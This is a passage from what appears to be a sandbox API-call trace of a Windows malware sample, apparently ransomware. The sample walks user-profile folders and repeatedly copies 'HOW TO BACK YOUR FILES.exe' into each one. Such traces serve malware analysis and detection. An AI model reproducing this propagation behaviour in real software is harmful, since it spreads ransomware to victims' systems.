Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.621] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.621] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.621] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.622] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.622] GetLastError () returned 0x0 [0042.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.622] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.622] CloseHandle (hObject=0x118) returned 1 [0042.622] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.622] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.622] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.622] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.622] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.622] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.623] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.623] GetLastError () returned 0x0 [0042.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.623] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.623] CloseHandle (hObject=0x118) returned 1 [0042.623] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.623] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.624] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0042.624] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0042.624] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.624] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.624] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.625] GetLastError () returned 0x0 [0042.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.625] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.625] CloseHandle (hObject=0x118) returned 1 [0042.625] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.625] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.625] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0042.625] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0042.625] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.625] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.626] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.626] GetLastError () returned 0x0 [0042.626] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.626] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.626] CloseHandle (hObject=0x118) returned 1 [0042.626] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.626] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.626] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.626] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.626] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.627] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.627] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.627] GetLastError () returned 0x0 [0042.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.627] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.627] CloseHandle (hObject=0x118) returned 1 [0042.627] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.627] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.628] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.628] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.628] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.628] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.628] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.628] GetLastError () returned 0x0 [0042.628] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.628] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.629] CloseHandle (hObject=0x118) returned 1 [0042.629] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.629] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.629] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.629] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.629] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.629] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.630] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.630] GetLastError () returned 0x0 [0042.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.630] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.630] CloseHandle (hObject=0x118) returned 1 [0042.630] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.630] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.630] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.631] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.631] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.631] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.631] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.631] GetLastError () returned 0x0 [0042.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.631] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.631] CloseHandle (hObject=0x118) returned 1 [0042.631] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.632] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.632] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0042.632] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0042.632] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.632] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.632] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.632] GetLastError () returned 0x0 [0042.632] RtlAllocateHeap 